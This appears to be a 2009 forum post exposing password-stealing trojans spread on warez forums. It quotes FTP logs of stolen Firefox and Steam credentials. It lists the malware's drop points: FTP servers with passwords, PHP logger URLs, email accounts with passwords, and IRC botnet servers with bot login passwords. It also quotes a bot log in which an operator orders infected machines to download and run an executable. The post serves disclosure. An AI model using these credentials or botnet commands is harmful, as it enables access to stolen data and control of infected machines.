| ftp.doting.ceege.net-ftp_log wrote: | Fri Aug 07 06:49:29 2009 0 92.82.59.250 16 /home/dotingce/public_html/[rD]-FF-Stealer/ILLUZ1ON-PC_Firefox_PW.txt b _ i r dotingce ftp 1 * c Fri Aug 07 06:49:30 2009 0 92.82.59.250 912 /home/dotingce/public_html/[rD]-FF-Stealer/ILLUZ1ON-PC_PWs.html b _ i r dotingce ftp 1 * c Fri Aug 07 06:49:53 2009 0 92.82.59.250 16 /home/dotingce/public_html/[rD]-FF-Stealer/ILLUZ1ON-PC_Firefox_PW.txt a _ o r dotingce ftp 1 * c Fri Aug 07 06:49:59 2009 0 92.82.59.250 912 /home/dotingce/public_html/[rD]-FF-Stealer/ILLUZ1ON-PC_PWs.html a _ o r dotingce ftp 1 * c Fri Aug 07 06:51:02 2009 0 92.82.59.250 16 /home/dotingce/public_html/[rD]-FF-Stealer/ILLUZ1ON-PC_Firefox_PW.txt b _ o r dotingce ftp 1 * c Fri Aug 07 06:51:35 2009 0 92.82.59.250 912 /home/dotingce/public_html/[rD]-FF-Stealer/ILLUZ1ON-PC_PWs.html b _ o r dotingce ftp 1 * c Fri Aug 07 06:52:37 2009 0 92.82.59.250 16 /home/dotingce/public_html/[rD]-FF-Stealer/ILLUZ1ON-PC_Firefox_PW.txt b _ o r dotingce ftp 1 * c Fri Aug 07 06:59:46 2009 0 92.82.59.250 16 /home/dotingce/public_html/[rD]-FF-Stealer/ILLUZ1ON-PC_Firefox_PW.txt b _ i r dotingce ftp 1 * c Fri Aug 07 06:59:48 2009 1 92.82.59.250 5184 /home/dotingce/public_html/[rD]-FF-Stealer/ILLUZ1ON-PC_PWs.html b _ i r dotingce ftp 1 * c Fri Aug 07 07:54:59 2009 0 92.82.59.250 56 /home/dotingce/public_html/[rD]-FF-Stealer/[Steam]Logz/Steam-Stealer_Logz.txt a _ o r dotingce ftp 1 * c Fri Aug 07 07:55:14 2009 0 92.82.59.250 84 /home/dotingce/public_html/[rD]-FF-Stealer/[Steam]Logz/Steam-Stealer_Logz.txt a _ o r dotingce ftp 1 * c Fri Aug 07 07:56:15 2009 0 92.82.59.250 51 /home/dotingce/public_html/[rD]-FF-Stealer/[Steam]Logz/Steam-Stealer_Logz.txt a _ o r dotingce ftp 1 * c Fri Aug 07 07:57:28 2009 0 92.82.59.250 16 /home/dotingce/public_html/[rD]-FF-Stealer/ILLUZ1ON-PC_Firefox_PW.txt b _ i r dotingce ftp 1 * c Fri Aug 07 07:57:29 2009 0 92.82.59.250 5184 /home/dotingce/public_html/[rD]-FF-Stealer/ILLUZ1ON-PC_PWs.html b _ i r dotingce ftp 1 * c Fri Aug 07 08:09:29 2009 0 92.82.59.250 11103 /home/dotingce/public_html/FF.txt a _ o r dotingce ftp 1 * c Fri Aug 07 12:59:06 2009 0 92.82.59.250 28 /home/dotingce/public_html/[rD]-FF-Stealer/[Steam]Logz/Steam-Stealer_Logz.txt a _ o r dotingce ftp 1 * c |
|
- ftp://ftp.drivehq.com user: TraXdata0_0 password: darksonsqwerty00
Source forum: http://warez-bb.org user: jcchsms
- ftp://ftp.drivehq.com user: sn4ke password: godofhacker
Source forum: http://warez-bb.org user: ThieF4eVeR
- ftp://ftp.drivehq.com user: andre222 password: 20111993
Source forum: http://warez-bb.org user: yaabe
- PHP loggers:
- http://www.stealerek.yoyo.pl/plik.php
Source forum: http://warez-bb.org user: bushin_shadow
- http://1-2-3nds.com/send.php
Source forum: http://warez-bb.org user: former
- http://warezbb.info/Dont_Bother/index.php
Source forums: http://warez-bb.org user: FreeZeFiRe (firefox3.exe) , Double Trouble (itune.exe) , http://katzforums.com users: haseeb123 (itune.exe) , dppanda (itune.exe)
- http://testing-yeah.us/www/db001/index.php
Source forum: http://warez-bb.org user: Bjerks
- http://testing-yeah.us/www/db002/index.php
Source forum: http://warez-bb.org user: W@RRi0R
- http://marions.blackapplehost.com/index.php
Source forums: http://warez-bb.org user: giannhs1973 , http://katzforums.com user: sokolovski
- http://www.hostbooters.com/PHP/index.php
Source forum: http://warez-bb.org users: nihang , afiser http://abc1.real1ty.org:3178 This host was offline when I checked it. The trojan would send something like this: | Code: | | [S]ADDNEW|US|7/31|oODU'''|yOÑOOOIEIYEOI|èùïè|oooooooooooooooooOEUD"îoÿUDUIOO"î oÿìéo_'<OûôÆ|ëOOOOEIoäìoïUIEOßUoìYßxoZ|[E][S]hello|[E] |
|
- http://therocker.justfree.com/index.php
Source forum: http://warez-bb.org user: Shakem2005
- http://rmws.blackapplehost.com/index.php
Source forum: http://warez-bb.org user: Svennzz
- http://olsi.oxyhost.com/index.php
Source forum: http://warez-bb.org user: Aeru
- http://quakeon.ueuo.com/index.php
http://projectwww.ueuo.com/index.php Source forum: http://warez-bb.org user: jostringuyen
- http://omgimstoned.oxyhost.com/index.php
Source forum: http://warez-bb.org user: omgimstoned
- http://www.faxulicnihnauka.us/logme/index.php?action=add&a=3&c=&u=&l=&p=
Source forums: http://katzforums.com users: cdubbz4 , shintocool , http://warez-bb.org user: Bjerks | project4p4.exe wrote: | | |http://www.faxulicnihnauka.us/logme/index.php|Error|An unexpected error occured|0|16|0|0|00|0|| |
|
- http://www.faxulicnihnauka.us/www/index.php
Source forums: http://katzforums.com user: softex , http://warez-bb.org user: chirum | project4p4.exe wrote: | | |http://www.faxulicnihnauka.us/www/index.php|Error|An unexpected error occured|0|16|0|0|00|0|| |
|
- http://rizwanisbest.6te.net/index.php
Source forum: http://katzforums.com user: strike06
- http://azureufc.blackapplehost.com/index.php
Source forum: http://pakwarez.com user: azureufc
- http://www.abousakr.hostoi.com/index.php
Source forum: http://pakwarez.com user: brazzO__
- http://www.pinoyblackhats.com/i/index.php
Source forum: http://pakwarez.com users: Domin , nicx
- http://domindomin.hostoi.com/mail.php
Source forum: http://pakwarez.com user: Domin This mail scrips is used to send e-mails to this address: sallywilliams007@gmail.com
- http://irdls.com/m2.php?id=softid=2&method=2&lock=
Source forum: http://pakwarez.com user: mschouhdry (yspyloader.dll)
- http://www.xblaccountdump.t35.com/log.php
Source forum: http://pakwarez.com user: Pacninja
- http://suhope.blackapplehost.com/s/index.php
Source forum: http://warez-bb.org user: chickenla
- http://www.xtrememyspace.com/ads/getAd.php
Source forum: http://warez-bb.org user: SHSW
- http://updater.strangled.net:3438
Source forum: http://warez-bb.org user: negplus
- http://www.xtremewarez.us/Fl2m3/index.php
Source forum: http://warez-bb.org users: neoasr , Skreem , waneros86
- http://play14.blackapplehost.com/index.php
Source forum: http://warez-bb.org user: woodson
- E-mail accounts:
- beamit2me@gmail.com password: juion911 , account used to send e-mails to gotcha@mexico.mx
Source forum: http://warez-bb.org user: sertanki4n (vsutil.exe) | vsutil.exe wrote: | =10;21;22;80;81;135;136;411;412;666;1433;1434;2012;2013;3306;3307;3308;3309;8080;9090# [ServiceName]=MS.Tcp Port Sharing Service [ServiceDisplayName]=MS.Tcp Port Sharing Service [ServiceDescription]=Provides ability to share TCP ports over the net.tcp protocol. |
|
- 0x664c615368@gmail.com password 123456abc , account used to send e-mails to webpr0xy@trojan.com
Source forum: http://warez-bb.org user: sertanki4n (vsutil.exe)
- IRC bots:
- irc.makaiwell.com channel: #ffsnet key: h4cker , login password for bots: faggoter (other channels used by this bot: #ffsnet.exploit , #ffsnet.keylog , #ffsnet.psniff )
- esco.ishidden.net:8022 channel: #spicland , login password for bots: nigerian ( system322.exe , downloaded from http://luvrugby.com/system322.exe )
- esco.ishidden.net:8022 channel: #spicland2 , login password for bots: nigerian ( system44.exe , downloaded from http://rapidshare.com/files/263660576/system44.exe )
| esco.ishidden.net:8022 wrote: | [22:41] <qmp> .login nigerian [22:41] <[00!ESP!648423]> .::[Main]::. Welcome. [22:41] <[00!USA!135374]> .::[Main]::. Welcome. [22:41] <[00!USA!830837]> .::[Main]::. Welcome. [22:41] <[00!PRT!565461]> .::[Main]::. Welcome. [22:41] <qmp> .new http://rapidshare.com/files/263660576/system44.exe mouse1 [22:41] <[00!USA!135374]> .::[Update]::. Bad URL or DNS Error, error: <2> [22:41] <[00!PRT!565461]> .::[Update]::. File download: 83.0KB to: C:\DOCUME~1\Andr3\DEFINI~1\Temp\eraseme_45106.exe @ 83.0KB/sec. [22:41] <[00!USA!830837]> .::[Update]::. File download: 83.0KB to: C:\DOCUME~1\Louis\LOCALS~1\Temp\eraseme_68644.exe @ 83.0KB/sec. [22:41] <[00!ESP!648423]> .::[Update]::. File download: 83.0KB to: C:\DOCUME~1\ADMINI~1\CONFIG~1\Temp\eraseme_62300.exe @ 83.0KB/sec. |
|
- f0gles.opendns.be channel: #chan# channel key: coke ( NESbot.exe , source forum: http://warez-bb.org user: tigersblackanamber )
|
|
|